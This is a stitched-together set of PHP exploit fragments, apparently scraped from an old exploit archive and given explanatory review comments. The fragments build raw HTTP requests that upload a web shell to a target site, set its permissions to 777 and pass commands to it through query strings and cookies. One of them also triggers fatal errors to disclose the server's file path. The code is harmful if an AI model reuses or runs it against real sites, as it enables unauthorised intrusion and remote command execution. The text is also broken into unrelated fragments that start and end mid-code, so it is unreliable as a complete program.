Exemple #1
chmod(\'piggy_marty.php\',777);');
# Step: upload the web shell.  $my_shell is built before this point (its tail,
# ending in a chmod(...,777) call, is visible just above) and is sent as the
# value of the "shell" form field.
# NOTE(review): the value is interpolated raw and never urlencode()d even
# though the Content-Type below claims application/x-www-form-urlencoded, so
# any '&', '+', '%' or '=' inside the shell source would be altered by the
# target's form parser -- confirm $my_shell is safe to send as-is.
$data = "shell={$my_shell}";
# Hand-built HTTP/1.0 request.  $p is the request-path prefix and $host the
# target; both come from the enclosing scope and are not defined here.
$packet = "POST " . $p . "index.php HTTP/1.0\r\n";
# NOTE(review): the wildcard is written "* /*" (with a space) and is sent
# exactly like that; a standard wildcard is "*/*".  Possibly an extraction
# artefact of this listing -- confirm against the original before reusing.
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
# $path here is a different variable from $p -- presumably the same prefix,
# but that cannot be confirmed from this excerpt.
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
# gzip/deflate are advertised; whether sendpacketii() inflates a compressed
# reply before the string checks below is not visible here -- TODO confirm.
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: " . $host . "\r\n";
# strlen() is byte-wise, which is exactly what Content-Length requires.
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cache-Control: no-cache\r\n\r\n";
$packet .= $data;
# sendpacketii() is defined elsewhere; it is assumed to transmit the packet
# and leave the raw reply in the global $html read below -- not verifiable
# from this excerpt.
sendpacketii($packet);
echo "StepX - Executing Shell..\r\n";
# Step: request the dropped file and pass it the command.  $cmd is
# interpolated raw into both the query string and a Cookie header; the dropped
# file's source is not shown, so which of the two it reads cannot be told here.
# NOTE(review): no urlencode() -- a space, '&' or '#' in $cmd breaks the
# request line.
$packet = "GET " . $p . "piggy_marty.php?cmd={$cmd} HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Cookie: cmd={$cmd}\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
# "666999" is the marker the dropped file is expected to emit around command
# output.  strstr() returns false only when the marker is absent, so using it
# as a boolean is safe here (unlike strpos(), a match at offset 0 is truthy).
if (strstr($html, "666999")) {
    echo "Exploit succeeded...\r\n";
    # The marker is present, so explode() yields at least two elements:
    # $temp[1] is everything after the first marker, up to the second one if
    # the output is wrapped on both sides.
    $temp = explode("666999", $html);
    die("\r\n" . $temp[1] . "\r\n");
}
# Coded With BH Fast Generator v0.1
?>

# milw0rm.com [2007-05-29]
Exemple #2
# Send one command to the previously dropped shell.php and report the result.
#
# Everything is taken from globals: $p (path prefix), $host/$port (target),
# $command (urlencode()d into the query string) and $html, which
# sendpacketii() is expected to fill with the raw reply.  $packet is also
# global and is overwritten with the request that was sent.  Prints
# "Exploit succeeded..." and terminates the script when the reply contains
# the "Hi Master" banner; otherwise prints "Exploit failed..." and returns.
#
# NOTE(review): eregi() was removed in PHP 7.0; on a modern interpreter this
# function dies with an "undefined function" error before the check runs.
# NOTE(review): the header value is spelled "CLose" and sent as-is;
# connection-option tokens are case-insensitive, so servers accept it.
function execute_commands()
{
    global $p, $host, $port, $packet, $command, $html;
    $lines = array(
        "GET " . $p . "shell.php?cmd=" . urlencode($command) . " HTTP/1.1",
        "Host: " . $host . ":" . $port,
        "Connection: CLose",
    );
    $packet = implode("\r\n", $lines) . "\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    if (!eregi("Hi Master", $html)) {
        echo "Exploit failed...";
        return;
    }
    echo "Exploit succeeded...";
    die;
}
# Request each candidate path until one triggers a PHP "Fatal error" page,
# then derive the application's filesystem root from the path in that error.
#
# NOTE(review): the $paths parameter is immediately rebound by the
# `global $paths` declaration below, so the caller's argument is discarded
# and the global array is used instead -- confirm this is intended.
# The result is communicated through the global $application_path (and
# echoed as HTML); nothing is returned.  The reply text is read from the
# global $html, which sendpacketii() is assumed to populate.
#
# NOTE(review): eregi() was removed in PHP 7.0.
function disclose_path($paths)
{
    global $p, $paths, $host, $html, $application_path;
    for ($i = 0; $i <= count($paths) - 1; $i++) {
        $packet = "GET " . $p . $paths[$i] . " HTTP/1.1\r\n";
        $packet .= "Host: " . $host . "\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        show($packet);
        sendpacketii($packet);
        if (eregi('Fatal error', $html)) {
            # Expects PHP's html_errors format:
            #   "... in <b>/abs/path/file.php</b> on line N".
            # NOTE(review): with plain-text errors (html_errors=Off) 'in <b>' is
            # absent, explode() returns a single element and $temp[1] is an
            # undefined index (notice, null) -- there is no guard here.
            $temp = explode('in <b>', $html);
            $temp2 = explode('</b>', $temp[1]);
            # $result is never initialised; PHP creates the array on first write.
            $result[$i] = $temp2[0];
            # Take the first component of the probe URL (e.g. "dir" from
            # "dir/x.php"); everything in the error path before that component
            # is treated as the application root.
            # NOTE(review): if $paths[$i] starts with '/', $temp[0] is '' and
            # explode() with an empty separator warns (PHP < 8) or throws
            # ValueError (PHP 8+).
            $temp = explode('/', $paths[$i]);
            $temp2 = explode($temp[0], $result[$i]);
            $result[$i] = $temp2[0];
            # HTML-escaped because the value comes straight from the target's
            # response and this tool's output is rendered as HTML (<br> tags).
            echo "<br>" . htmlentities($result[$i]) . "<br>";
            $application_path = $result[$i];
            break;
        }
    }
}
Exemple #4
         }
         if (eregi("url=\"", $HtMl)) {
             $temp = explode("url=\"", $HtMl);
             $temp2 = explode("\"", $temp[1]);
             $path_to_shell = $temp2[0];
         }
         echo "<br>path where I search shell: " . htmlentities($path_to_shell) . "<br>";
         # STEP 2 -> Launch commands...
         #by default a "UserFiles/File/" dir is generated inside site root when you upload
         #files, this dir is not protected by an .htaccess file or whatever
         $pAcKeT = "GET " . $path_to_shell . $filename . "?cmd=" . urlencode($cmd) . " HTTP/1.1\r\n";
         $pAcKeT .= "User-Agent: GoogleBot/1.1\r\n";
         $pAcKeT .= "Host: " . $host . "\r\n";
         $pAcKeT .= "Connection: Close\r\n\r\n";
         show($pAcKeT);
         sendpacketii($pAcKeT);
         if (eregi("200 OK", $HtMl)) {
             if (eregi("Hi Master!", $HtMl)) {
                 echo "Exploit succeeded...<br>";
                 echo "we have a shell in http://" . $host . $path_to_shell . $filename . "<br>";
                 echo "we should have phpinfo() here, see html...<br>";
                 die;
             } else {
                 echo "Successfully uploades...<br>\n\t\t\t                      but is not an executable on target server...<br>";
             }
         }
         refresh();
     }
 }
 # Fallthrough: only reached when no earlier step terminated the script with die().
 print "Exploit failed...";
 # Probe pms.php with the supplied cookie and report whether the reply
 # contains the "sun-tzu" marker.
 #
 # Reads the globals $p (path prefix), $host, $cookie (sent verbatim in a
 # Cookie header -- it is not validated or encoded here) and $html, which
 # sendpacketii() is assumed to fill with the raw reply.  Returns true when
 # the reply contains "sun-tzu" (case-insensitive), false otherwise.
 #
 # NOTE(review): eregi() was removed in PHP 7.0, so on a modern interpreter
 # this raises an "undefined function" fatal error instead of returning.
 function check_pm()
 {
     global $p, $host, $cookie, $html;
     $request = "GET " . $p . "pms.php HTTP/1.0\r\n"
         . "Host: " . $host . "\r\n"
         . "User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n"
         . "Cookie: " . $cookie . "\r\n"
         . "Connection: Close\r\n\r\n";
     sendpacketii($request);
     return eregi("sun-tzu", $html) ? true : false;
 }